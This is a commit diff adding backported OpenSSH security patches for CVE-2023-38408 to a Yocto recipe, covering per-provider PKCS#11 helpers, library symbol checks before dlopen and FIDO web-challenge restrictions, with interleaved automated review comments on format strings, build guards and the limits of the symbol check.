271-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
272+static int
273+rsa_finish(RSA *rsa)
274+{
275+ struct helper *helper;
276+
277+ if ((helper = helper_by_rsa(rsa)) == NULL)
278+ fatal("%s: no helper for PKCS11 key", __func__);
279+ debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
280+ if (helper->rsa_finish != NULL)
281+ helper->rsa_finish(rsa);
282+ if (helper->nrsa == 0)
283+ fatal("%s: RSA refcount error", __func__);
284+ helper->nrsa--;
285+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
286+ helper->path, helper->nrsa, helper->nec);
287+ if (helper->nrsa == 0 && helper->nec == 0)
288+ helper_terminate(helper);
289+ return 1;
290+}
291+
292 static ECDSA_SIG *
293 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
294 const BIGNUM *rp, EC_KEY *ec)
295@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
296 u_char *blob = NULL, *signature = NULL;
297 size_t blen, slen = 0;
298 int r, nid;
299+ struct helper *helper;
300
301+ if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
302+ fatal("%s: no helper for PKCS11 key", __func__);
303+ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
304 nid = sshkey_ecdsa_key_to_nid(ec);
305 if (nid < 0) {
306 error("%s: couldn't get curve nid", __func__);
307@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
308 (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
309 (r = sshbuf_put_u32(msg, 0)) != 0)
310 fatal("%s: buffer error: %s", __func__, ssh_err(r));
311- send_msg(msg);
312+ send_msg(helper->fd, msg);
313 sshbuf_reset(msg);
314
315- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
316+ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
317 if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
318 fatal("%s: buffer error: %s", __func__, ssh_err(r));
319 cp = signature;
320@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
321 sshbuf_free(msg);
322 return (ret);
323 }
324-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
325
326-static RSA_METHOD *helper_rsa;
327-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
328-static EC_KEY_METHOD *helper_ecdsa;
329-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
330+static void
331+ecdsa_do_finish(EC_KEY *ec)
332+{
333+ struct helper *helper;
334+
335+ if ((helper = helper_by_ec(ec)) == NULL)
336+ fatal("%s: no helper for PKCS11 key", __func__);
337+ debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
338+ if (helper->ec_finish != NULL)
339+ helper->ec_finish(ec);
340+ if (helper->nec == 0)
341+ fatal("%s: ECDSA refcount error", __func__);
342+ helper->nec--;
343+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
344+ helper->path, helper->nrsa, helper->nec);
345+ if (helper->nrsa == 0 && helper->nec == 0)
346+ helper_terminate(helper);
347+}
348
349 /* redirect private key crypto operations to the ssh-pkcs11-helper */
350 static void
351-wrap_key(struct sshkey *k)
352+wrap_key(struct helper *helper, struct sshkey *k)
353 {
354- if (k->type == KEY_RSA)
355- RSA_set_method(k->rsa, helper_rsa);
356-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
357- else if (k->type == KEY_ECDSA)
358- EC_KEY_set_method(k->ecdsa, helper_ecdsa);
359-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
360- else
361+ debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
362+ if (k->type == KEY_RSA) {
363+ RSA_set_method(k->rsa, helper->rsa_meth);
364+ if (helper->nrsa++ >= INT_MAX)
365+ fatal("%s: RSA refcount error", __func__);
366+ } else if (k->type == KEY_ECDSA) {
367+ EC_KEY_set_method(k->ecdsa, helper->ec_meth);
368+ if (helper->nec++ >= INT_MAX)
369+ fatal("%s: EC refcount error", __func__);
370+ } else
371 fatal("%s: unknown key type", __func__);
372+ k->flags |= SSHKEY_FLAG_EXT;
373+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
374+ helper->path, helper->nrsa, helper->nec);
375 }
376
377 static int
378-pkcs11_start_helper_methods(void)
379+pkcs11_start_helper_methods(struct helper *helper)
380 {
381- if (helper_rsa != NULL)
382- return (0);
383-
384-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
385- int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
386+ int (*ec_init)(EC_KEY *key);
387+ int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
388+ int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
389+ int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
390+ int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
391+ int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
392 unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
393- if (helper_ecdsa != NULL)
394- return (0);
395- helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
396- if (helper_ecdsa == NULL)
397- return (-1);
398- EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
399- EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
400-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
401-
402- if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
403+ RSA_METHOD *rsa_meth;
404+ EC_KEY_METHOD *ec_meth;
405+
406+ if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
407+ return -1;
408+ EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
409+ EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
410+ EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
411+ &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
412+ EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
413+ ec_copy, ec_set_group, ec_set_private, ec_set_public);
414+
415+ if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
416 fatal("%s: RSA_meth_dup failed", __func__);
417- if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
418- !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
419+ helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
420+ if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
421+ !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
422+ !RSA_meth_set_finish(rsa_meth, rsa_finish))
423 fatal("%s: failed to prepare method", __func__);
424
425- return (0);
426+ helper->ec_meth = ec_meth;
427+ helper->rsa_meth = rsa_meth;
428+ return 0;
429 }
430
431-static int
432-pkcs11_start_helper(void)
433+static struct helper *
434+pkcs11_start_helper(const char *path)
435 {
436 int pair[2];
437- char *helper, *verbosity = NULL;
438-
439- if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
440- verbosity = "-vvv";
441-
442- if (pkcs11_start_helper_methods() == -1) {
443- error("pkcs11_start_helper_methods failed");
444- return (-1);
445- }
446+ char *prog, *verbosity = NULL;
447+ struct helper *helper;
448+ pid_t pid;
449
450+ if (nhelpers >= INT_MAX)
451+ fatal("%s: too many helpers", __func__);
452+ debug3("%s: start helper for %s", __func__, path);
453 if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
454 error("socketpair: %s", strerror(errno));
455- return (-1);
456+ return NULL;
457+ }
458+ helper = xcalloc(1, sizeof(*helper));
459+ if (pkcs11_start_helper_methods(helper) == -1) {
460+ error("pkcs11_start_helper_methods failed");
461+ goto fail;
462 }
463 if ((pid = fork()) == -1) {
464 error("fork: %s", strerror(errno));
465- return (-1);
466+ fail:
467+ close(pair[0]);
468+ close(pair[1]);
469+ RSA_meth_free(helper->rsa_meth);
470+ EC_KEY_METHOD_free(helper->ec_meth);
471+ free(helper);
472+ return NULL;
473 } else if (pid == 0) {
474 if ((dup2(pair[1], STDIN_FILENO) == -1) ||
475 (dup2(pair[1], STDOUT_FILENO) == -1)) {
476@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
477 }
478 close(pair[0]);
479 close(pair[1]);
480- helper = getenv("SSH_PKCS11_HELPER");
481- if (helper == NULL || strlen(helper) == 0)
482- helper = _PATH_SSH_PKCS11_HELPER;
483+ prog = getenv("SSH_PKCS11_HELPER");
484+ if (prog == NULL || strlen(prog) == 0)
485+ prog = _PATH_SSH_PKCS11_HELPER;
486+ if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
487+ verbosity = "-vvv";
488 debug("%s: starting %s %s", __func__, helper,
489 verbosity == NULL ? "" : verbosity);
490- execlp(helper, helper, verbosity, (char *)NULL);
491- fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
492+ execlp(prog, prog, verbosity, (char *)NULL);
493+ fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
494 _exit(1);
495 }
496 close(pair[1]);
497- fd = pair[0];
498- return (0);
499+ helper->fd = pair[0];
500+ helper->path = xstrdup(path);
501+ helper->pid = pid;
502+ debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
503+ helper->path, helper->fd, (long)helper->pid);
504+ helpers = xrecallocarray(helpers, nhelpers,
505+ nhelpers + 1, sizeof(*helpers));
506+ helpers[nhelpers++] = helper;
507+ return helper;
508 }
509
510 int
511@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
512 size_t blen;
513 u_int nkeys, i;
514 struct sshbuf *msg;
515+ struct helper *helper;
516
517- if (fd < 0 && pkcs11_start_helper() < 0)
518- return (-1);
519+ if ((helper = helper_by_provider(name)) == NULL &&
520+ (helper = pkcs11_start_helper(name)) == NULL)
521+ return -1;
522
523 if ((msg = sshbuf_new()) == NULL)
524 fatal("%s: sshbuf_new failed", __func__);
525@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
526 (r = sshbuf_put_cstring(msg, name)) != 0 ||
527 (r = sshbuf_put_cstring(msg, pin)) != 0)
528 fatal("%s: buffer error: %s", __func__, ssh_err(r));
529- send_msg(msg);
530+ send_msg(helper->fd, msg);
531 sshbuf_reset(msg);
532
533- type = recv_msg(msg);
534+ type = recv_msg(helper->fd, msg);
535 if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
536 if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
537 fatal("%s: buffer error: %s", __func__, ssh_err(r));
538@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
539 __func__, ssh_err(r));
540 if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
541 fatal("%s: bad key: %s", __func__, ssh_err(r));
542- wrap_key(k);
543+ wrap_key(helper, k);
544 (*keysp)[i] = k;
545 if (labelsp)
546 (*labelsp)[i] = label;
547@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
548 int
549 pkcs11_del_provider(char *name)
550 {
551- int r, ret = -1;
552- struct sshbuf *msg;
553-
554- if ((msg = sshbuf_new()) == NULL)
555- fatal("%s: sshbuf_new failed", __func__);
556- if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
557- (r = sshbuf_put_cstring(msg, name)) != 0 ||
558- (r = sshbuf_put_cstring(msg, "")) != 0)
559- fatal("%s: buffer error: %s", __func__, ssh_err(r));
560- send_msg(msg);
561- sshbuf_reset(msg);
562-
563- if (recv_msg(msg) == SSH_AGENT_SUCCESS)
564- ret = 0;
565- sshbuf_free(msg);
566- return (ret);
567+ struct helper *helper;
568+
569+ /*
570+ * ssh-agent deletes keys before calling this, so the helper entry
571+ * should be gone before we get here.
572+ */
573+ debug3("%s: delete %s", __func__, name);
574+ if ((helper = helper_by_provider(name)) != NULL)
575+ helper_terminate(helper);
576+ return 0;
577 }
578-
579 #endif /* ENABLE_PKCS11 */
580--
5812.41.0
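Review bot: Two debug calls in this backport pass arguments that do not match their format strings. In pkcs11_start_helper the unchanged context line `debug("%s: starting %s %s", __func__, helper,` still passes `helper`, which this patch changes from `char *` to `struct helper *`; it should read `debug("%s: starting %s %s", __func__, prog,`. In helper_terminate the call `debug3("terminating helper for %s; "` has three conversions but is given `__func__`, `helper->path`, `helper->nrsa` and `helper->nec`, so it needs the `"%s: "` prefix the other calls use: `debug3("%s: terminating helper for %s; "`. Separately, the patch removes the `OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW` guards that CVE-2023-38408-01.patch had just added to ssh-pkcs11-client.c. `struct helper`, `helper_by_ec` and `ecdsa_do_finish` therefore use `EC_KEY_METHOD` unconditionally, and a build without ECC support would presumably no longer compile.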
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
1From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 14:02:27 +0000
4Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
5 symbols
6
7This checks via nlist(3) that candidate provider libraries contain one
8of the symbols that we will require prior to dlopen(), which can cause
9a number of side effects, including execution of constructors.
10
11Feedback deraadt; ok markus
12
13OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
14
15Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
16CVE: CVE-2023-38408
17Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
18---
19 misc.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
20 misc.h | 1 +
21 ssh-pkcs11.c | 4 +++
22 ssh-sk.c | 6 ++--
23 4 files changed, 86 insertions(+), 2 deletions(-)
24
25diff --git a/misc.c b/misc.c
26index 3a31d5c..8a107e4 100644
27--- a/misc.c
28+++ b/misc.c
29@@ -28,6 +28,7 @@
30
31 #include <sys/types.h>
32 #include <sys/ioctl.h>
33+#include <sys/mman.h>
34 #include <sys/socket.h>
35 #include <sys/stat.h>
36 #include <sys/time.h>
37@@ -41,6 +42,9 @@
38 #ifdef HAVE_POLL_H
39 #include <poll.h>
40 #endif
41+#ifdef HAVE_NLIST_H
42+#include <nlist.h>
43+#endif
44 #include <signal.h>
45 #include <stdarg.h>
46 #include <stdio.h>
47@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
48 }
49 return osa.sa_handler;
50 }
51+
52+
53+/*
54+ * Returns zero if the library at 'path' contains symbol 's', nonzero
55+ * otherwise.
56+ */
57+int
58+lib_contains_symbol(const char *path, const char *s)
59+{
60+#ifdef HAVE_NLIST_H
61+ struct nlist nl[2];
62+ int ret = -1, r;
63+
64+ memset(nl, 0, sizeof(nl));
65+ nl[0].n_name = xstrdup(s);
66+ nl[1].n_name = NULL;
67+ if ((r = nlist(path, nl)) == -1) {
68+ error("%s: nlist failed for %s", __func__, path);
69+ goto out;
70+ }
71+ if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
72+ error("%s: library %s does not contain symbol %s", __func__, path, s);
73+ goto out;
74+ }
75+ /* success */
76+ ret = 0;
77+ out:
78+ free(nl[0].n_name);
79+ return ret;
80+#else /* HAVE_NLIST_H */
81+ int fd, ret = -1;
82+ struct stat st;
83+ void *m = NULL;
84+ size_t sz = 0;
85+
86+ memset(&st, 0, sizeof(st));
87+ if ((fd = open(path, O_RDONLY)) < 0) {
88+ error("%s: open %s: %s", __func__, path, strerror(errno));
89+ return -1;
90+ }
91+ if (fstat(fd, &st) != 0) {
92+ error("%s: fstat %s: %s", __func__, path, strerror(errno));
93+ goto out;
94+ }
95+ if (!S_ISREG(st.st_mode)) {
96+ error("%s: %s is not a regular file", __func__, path);
97+ goto out;
98+ }
99+ if (st.st_size < 0 ||
100+ (size_t)st.st_size < strlen(s) ||
101+ st.st_size >= INT_MAX/2) {
102+ error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
103+ goto out;
104+ }
105+ sz = (size_t)st.st_size;
106+ if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
107+ m == NULL) {
108+ error("%s: mmap %s: %s", __func__, path, strerror(errno));
109+ goto out;
110+ }
111+ if (memmem(m, sz, s, strlen(s)) == NULL) {
112+ error("%s: %s does not contain expected string %s", __func__, path, s);
113+ goto out;
114+ }
115+ /* success */
116+ ret = 0;
117+ out:
118+ if (m != NULL && m != MAP_FAILED)
119+ munmap(m, sz);
120+ close(fd);
121+ return ret;
122+#endif /* HAVE_NLIST_H */
123+}
124diff --git a/misc.h b/misc.h
125index 4a05db2..3f9f4db 100644
126--- a/misc.h
127+++ b/misc.h
128@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
129 int parse_absolute_time(const char *, uint64_t *);
130 void format_absolute_time(uint64_t, char *, size_t);
131 int path_absolute(const char *);
132+int lib_contains_symbol(const char *, const char *);
133
134 void sock_set_v6only(int);
135
136diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
137index b56a41b..639a6f7 100644
138--- a/ssh-pkcs11.c
139+++ b/ssh-pkcs11.c
140@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
141 __func__, provider_id);
142 goto fail;
143 }
144+ if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
145+ error("provider %s is not a PKCS11 library", provider_id);
146+ goto fail;
147+ }
148 /* open shared pkcs11-library */
149 if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
150 error("dlopen %s failed: %s", provider_id, dlerror());
151diff --git a/ssh-sk.c b/ssh-sk.c
152index 5ff9381..9df12cc 100644
153--- a/ssh-sk.c
154+++ b/ssh-sk.c
155@@ -119,10 +119,12 @@ sshsk_open(const char *path)
156 #endif
157 return ret;
158 }
159- if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
160- error("Provider \"%s\" dlopen failed: %s", path, dlerror());
161+ if (lib_contains_symbol(path, "sk_api_version") != 0) {
162+ error("provider %s is not an OpenSSH FIDO library", path);
163 goto fail;
164 }
165+ if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
166+ fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
167 if ((ret->sk_api_version = dlsym(ret->dlhandle,
168 "sk_api_version")) == NULL) {
169 error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
170--
1712.41.0
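Review bot: The header comment on lib_contains_symbol() in misc.c says it reports whether the library contains symbol 's', but the `#else` branch (no nlist.h) only runs `memmem()` over the mapped file, so any regular file containing that byte string passes. The comment should say so, for example `Without nlist(3) this is a substring search of the file contents: a sanity filter before dlopen(), not a symbol-table lookup.` The check and the later `dlopen()` in ssh-pkcs11.c and ssh-sk.c each open the path separately, so the file examined is not guaranteed to be the file loaded, and the check should not be treated as the only gate. In ssh-sk.c the dlopen failure also changes from `error()` plus `goto fail` to `fatal()`, which the commit message does not mention.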
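diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
+From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:55:53 +0000
+Subject: [PATCH 04/12] upstream: terminate process if requested to load a
+ PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
+
+OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index 639a6f7..7530acc 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ error("dlopen %s failed: %s", provider_id, dlerror());
+ goto fail;
+ }
+- if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
+- error("dlsym(C_GetFunctionList) failed: %s", dlerror());
+- goto fail;
+- }
++ if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
++ fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
+ p = xcalloc(1, sizeof(*p));
+ p->name = xstrdup(provider_id);
+ p->handle = handle;
+--
+2.41.0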
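Review bot: The new `fatal()` on a failed `dlsym(handle, "C_GetFunctionList")` in pkcs11_register_provider has no comment explaining why this one failure is terminal, while the dlopen() failure just above it still takes `goto fail`. By this point the library is already mapped into the process, so exiting is presumably deliberate, and fatal() ends whichever process called in here. A short comment above the check would keep a later cleanup from turning it back into a soft error, for example `/* library is already loaded and is not a PKCS#11 provider: do not keep running with it mapped */`. The function starts and ends outside the hunk.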
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
1From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Tue, 26 May 2020 01:26:58 +0000
4Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
5 challenges for FIDO
6
7keys.
8
9When signing messages in ssh-agent using a FIDO key that has an
10application string that does not start with "ssh:", ensure that the
11message being signed is one of the forms expected for the SSH protocol
12(currently pubkey authentication and sshsig signatures).
13
14This prevents ssh-agent forwarding on a host that has FIDO keys
15attached granting the ability for the remote side to sign challenges
16for web authentication using those keys too.
17
18Note that the converse case of web browsers signing SSH challenges is
19already precluded because no web RP can have the "ssh:" prefix in the
20application string that we require.
21
22ok markus@
23
24OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
25
26Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
27CVE: CVE-2023-38408
28Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
29---
30 ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
31 1 file changed, 100 insertions(+), 10 deletions(-)
32
33diff --git a/ssh-agent.c b/ssh-agent.c
34index ceb348c..1794f35 100644
35--- a/ssh-agent.c
36+++ b/ssh-agent.c
37@@ -1,4 +1,4 @@
38-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
39+/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
40 /*
41 * Author: Tatu Ylonen <ylo@cs.hut.fi>
42 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
43@@ -77,6 +77,7 @@
44
45 #include "xmalloc.h"
46 #include "ssh.h"
47+#include "ssh2.h"
48 #include "sshbuf.h"
49 #include "sshkey.h"
50 #include "authfd.h"
51@@ -167,6 +168,9 @@ static long lifetime = 0;
52
53 static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
54
55+/* Refuse signing of non-SSH messages for web-origin FIDO keys */
56+static int restrict_websafe = 1;
57+
58 static void
59 close_socket(SocketEntry *e)
60 {
61@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
62 return NULL;
63 }
64
65+/*
66+ * This function inspects a message to be signed by a FIDO key that has a
67+ * web-like application string (i.e. one that does not begin with "ssh:".
68+ * It checks that the message is one of those expected for SSH operations
69+ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
70+ * for the web.
71+ */
72+static int
73+check_websafe_message_contents(struct sshkey *key,
74+ const u_char *msg, size_t len)
75+{
76+ int matched = 0;
77+ struct sshbuf *b;
78+ u_char m, n;
79+ char *cp1 = NULL, *cp2 = NULL;
80+ int r;
81+ struct sshkey *mkey = NULL;
82+
83+ if ((b = sshbuf_from(msg, len)) == NULL)
84+ fatal("%s: sshbuf_new", __func__);
85+
86+ /* SSH userauth request */
87+ if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
88+ (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
89+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
90+ (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
91+ (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
92+ (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
93+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
94+ (r = sshkey_froms(b, &mkey)) == 0 && /* key */
95+ sshbuf_len(b) == 0) {
96+ debug("%s: parsed userauth", __func__);
97+ if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
98+ strcmp(cp1, "ssh-connection") == 0 &&
99+ strcmp(cp2, "publickey") == 0 &&
100+ sshkey_equal(key, mkey)) {
101+ debug("%s: well formed userauth", __func__);
102+ matched = 1;
103+ }
104+ }
105+ free(cp1);
106+ free(cp2);
107+ sshkey_free(mkey);
108+ sshbuf_free(b);
109+ if (matched)
110+ return 1;
111+
112+ if ((b = sshbuf_from(msg, len)) == NULL)
113+ fatal("%s: sshbuf_new", __func__);
114+ cp1 = cp2 = NULL;
115+ mkey = NULL;
116+
117+ /* SSHSIG */
118+ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
119+ (r = sshbuf_consume(b, 6)) == 0 &&
120+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
121+ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
122+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
123+ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
124+ sshbuf_len(b) == 0) {
125+ debug("%s: parsed sshsig", __func__);
126+ matched = 1;
127+ }
128+
129+ sshbuf_free(b);
130+ if (matched)
131+ return 1;
132+
133+ /* XXX CA signature operation */
134+
135+ error("web-origin key attempting to sign non-SSH message");
136+ return 0;
137+}
138+
139 /* ssh2 only */
140 static void
141 process_sign_request2(SocketEntry *e)
142@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
143 verbose("%s: user refused key", __func__);
144 goto send;
145 }
146- if (sshkey_is_sk(id->key) &&
147- (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
148- if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
149- SSH_FP_DEFAULT)) == NULL)
150- fatal("%s: fingerprint failed", __func__);
151- notifier = notify_start(0,
152- "Confirm user presence for key %s %s",
153- sshkey_type(id->key), fp);
154+ if (sshkey_is_sk(id->key)) {
155+ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
156+ !check_websafe_message_contents(key, data, dlen)) {
157+ /* error already logged */
158+ goto send;
159+ }
160+ if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
161+ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
162+ SSH_FP_DEFAULT)) == NULL)
163+ fatal("%s: fingerprint failed", __func__);
164+ notifier = notify_start(0,
165+ "Confirm user presence for key %s %s",
166+ sshkey_type(id->key), fp);
167+ }
168 }
169 if ((r = sshkey_sign(id->key, &signature, &slen,
170 data, dlen, agent_decode_alg(key, flags),
171@@ -1214,7 +1298,7 @@ main(int ac, char **av)
172 __progname = ssh_get_progname(av[0]);
173 seed_rng();
174
175- while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
176+ while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
177 switch (ch) {
178 case 'E':
179 fingerprint_hash = ssh_digest_alg_by_name(optarg);
180@@ -1229,6 +1313,12 @@ main(int ac, char **av)
181 case 'k':
182 k_flag++;
183 break;
184+ case 'O':
185+ if (strcmp(optarg, "no-restrict-websafe") == 0)
186+ restrict_websafe = 0;
187+ else
188+ fatal("Unknown -O option");
189+ break;
190 case 'P':
191 if (provider_whitelist != NULL)
192 fatal("-P option already specified");
193--
1942.41.0
